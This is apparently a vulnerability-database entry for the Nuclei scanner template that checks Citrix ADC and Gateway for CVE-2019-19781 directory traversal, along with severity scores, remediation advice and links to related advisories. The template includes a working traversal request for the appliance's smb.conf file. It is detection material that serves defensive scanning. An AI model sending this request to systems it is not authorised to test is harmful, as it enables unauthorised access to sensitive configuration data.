Lucene search
ProjectDiscoveryNUCLEI:CVE-2019-19781HistoryApr 05, 2020 - 10:27 p.m.
Citrix ADC and Gateway - Directory Traversal
2020-04-0522:27:04
ProjectDiscovery
github.com
8
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
id: CVE-2019-19781
info:
name: Citrix ADC and Gateway - Directory Traversal
author: organiccrap,geeknik
severity: critical
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.
remediation: |
Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability.
reference:
- https://support.citrix.com/article/CTX267027
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
- https://www.kb.cert.org/vuls/id/619785
- http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-19781
cwe-id: CWE-22
epss-score: 0.975
epss-percentile: 0.99976
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: citrix
product: application_delivery_controller_firmware
tags: cve,cve2019,lfi,kev,packetstorm,citrix
http:
- method: GET
path:
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers-condition: and
matchers:
- type: word
words:
- "[global]"
- type: status
status:
- 200
# digest: 4a0a00473045022100f061f7d1df5081b9ddfd5eed0b03d118d863197a0180f8a5eca43f87e5ecb6cc022069ca1e38aaf7a7f035286be68225f35aa2f721f0d63bd0a155477d982b730d10:922c64590222798bb761d5b6d8e72950References
packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
nvd.nist.gov/vuln/detail/CVE-2019-19781
support.citrix.com/article/CTX267027
www.kb.cert.org/vuls/id/619785
Related
githubexploit
githubexploit
packetstorm
packetstorm
Citrix Application Delivery Controller / Gateway Remote Code Execution
2020-01-11 00:00:00
Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal
2020-01-11 00:00:00
Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution
2020-01-13 00:00:00
rapid7blog
rapid7blog
malwarebytes
malwarebytes
Healthcare security update: death by ransomware, what’s next?
2020-10-08 15:30:00
Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities
2021-04-16 14:59:38
Atomic research institute breached via VPN vulnerability
2021-06-21 13:53:03
cisa
cisa
Citrix Releases Security Updates for SD-WAN WANOP
2020-01-23 00:00:00
CISA Releases Test for Citrix ADC and Gateway Vulnerability
2020-01-13 00:00:00
Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory
2020-01-17 00:00:00
krebs
krebs
Hackers Were Inside Citrix for Five Months
2020-02-19 15:55:04
nessus
nessus
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)
2020-01-09 00:00:00
FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)
2020-01-15 00:00:00
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)
2019-12-24 00:00:00
symantec
symantec
Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability
2019-12-17 00:00:00
prion
prion
Directory traversal
2019-12-27 14:15:00
exploitpack
exploitpack
zdt
zdt
ics
ics
Detecting Citrix CVE-2019-19781
2020-05-21 12:00:00
APT Groups Target Healthcare and Essential Services
2022-01-25 12:00:00
COVID-19 Exploited by Malicious Cyber Actors
2020-04-08 12:00:00
cve
cve
CVE-2019-19781
2019-12-27 14:15:00
attackerkb
attackerkb
CVE-2019-19781
2019-11-05 00:00:00
CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability
2020-04-27 00:00:00
thn
thn
A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems
2020-09-21 10:20:00
Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack
2020-01-20 14:24:00
PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability
2020-01-11 10:21:00
fireeye
fireeye
metasploit
metasploit
Citrix ADC (NetScaler) Directory Traversal Scanner
2020-01-13 22:39:05
Citrix ADC (NetScaler) Directory Traversal RCE
2021-04-16 00:13:25
citrix
citrix
ptsecurity
ptsecurity
PT-2020-01: Arbitrary code execution in Citrix ADC
2019-05-12 00:00:00
freebsd
freebsd
Template::Toolkit -- Directory traversal on write
2019-12-13 00:00:00
cisa_kev
cisa_kev
Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability
2021-11-03 00:00:00
qualysblog
qualysblog
Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)
2020-01-09 00:12:26
Nefilim Ransomware
2021-05-12 15:34:00
checkpoint_advisories
checkpoint_advisories
Citrix Multiple Products Directory Traversal (CVE-2019-19781)
2020-01-09 00:00:00
canvas
canvas
Immunity Canvas: NETSCALER_TRAVERSAL_RCE
2019-12-27 14:15:00
threatpost
threatpost
Postmortem on U.S. Census Hack Exposes Cybersecurity Failures
2021-08-19 14:35:49
RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes
2019-03-05 11:00:03
Citrix Accelerates Patch Rollout For Critical RCE Flaw
2020-01-21 17:19:28
talosblog
talosblog
Threat Source newsletter (Jan. 30, 2020)
2020-01-30 11:00:12
New Snort rules protect against recently discovered Citrix vulnerability
2020-01-15 11:41:36
Threat Source newsletter (Jan. 16, 2019)
2020-01-23 07:27:43
impervablog
impervablog
Imperva Mitigates Exploits of Citrix Vulnerability – Right Out of the Box
2020-01-19 15:00:50
Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF
2020-07-06 15:01:00
cert
cert
exploitdb
exploitdb
kitploit
kitploit
securelist
securelist
Incident Response Analyst Report 2019
2020-08-06 10:00:34
mssecure
mssecure
avleonov
avleonov
Security News: Exchange ProxyShell, Zoom RCE, Citrix Canceled PT Acknowledgments, Cisco No Patch Router RCEs
2021-08-31 23:16:51
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
mmpc
mmpc
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for NUCLEI:CVE-2019-19781